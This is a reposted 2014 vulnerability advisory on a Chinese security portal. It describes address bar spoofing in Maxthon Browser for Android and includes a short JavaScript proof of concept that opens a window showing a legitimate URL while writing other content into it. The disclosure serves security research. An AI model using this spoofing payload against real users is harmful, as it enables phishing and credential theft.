首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Maxthon Browser Address Bar Spoofing
来源:http://rafayhackingarticles.net 作者:Baloch 发布时间:2014-12-30  

Product: Maxthon Browser
#Vulnerability: Address Bar Spoofing Vulnerability
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rafayhackingarticles.net

*Introduction*

Maxthon browser for Android was prone to an "Address Bar Spoofing"
vulnerability wdue to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.

*POC*

Following is the POC that could be used to reproduce the issue:

<script> document.getElementById('one').onclick = function() {
myWindow=window.open('http://rafayhackingarticles.net/','RHA','width=300,height=300,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still
being hosted another domain, however the domain is pointing to
rafayhackingarticles.net.</b><br><br><iframe src=\"
http://www.rafayhackingarticles.net/\");></iframe></scri+pt></body></html>");
myWindow.focus(); return false; } </script>


*impact*

The issue could be abused to carry out more effective phishing attacks
against it's users.

*Fix*

We tried to contact the vendor several times however we did not recieve any
response


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·jetAudio 8.1.3.2200 Crash Proo
·Desktop Linux Password Stealer
·WhatsApp <= 2.11.476 - Remote
·ProjectSend Arbitrary File Upl
·WordPress Themes download.php
·Liferay Portal 7.0.x <= 7.0.2
·AMSI 3.20.47 Build 37 File Dis
·PHPads <= 213607 - Authenticat
·Phase botnet blind SQL injecti
·i-FTP Schedule Buffer Overflow
·GParted 0.14.1 - OS Command Ex
·WordPress RevSlider Local File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved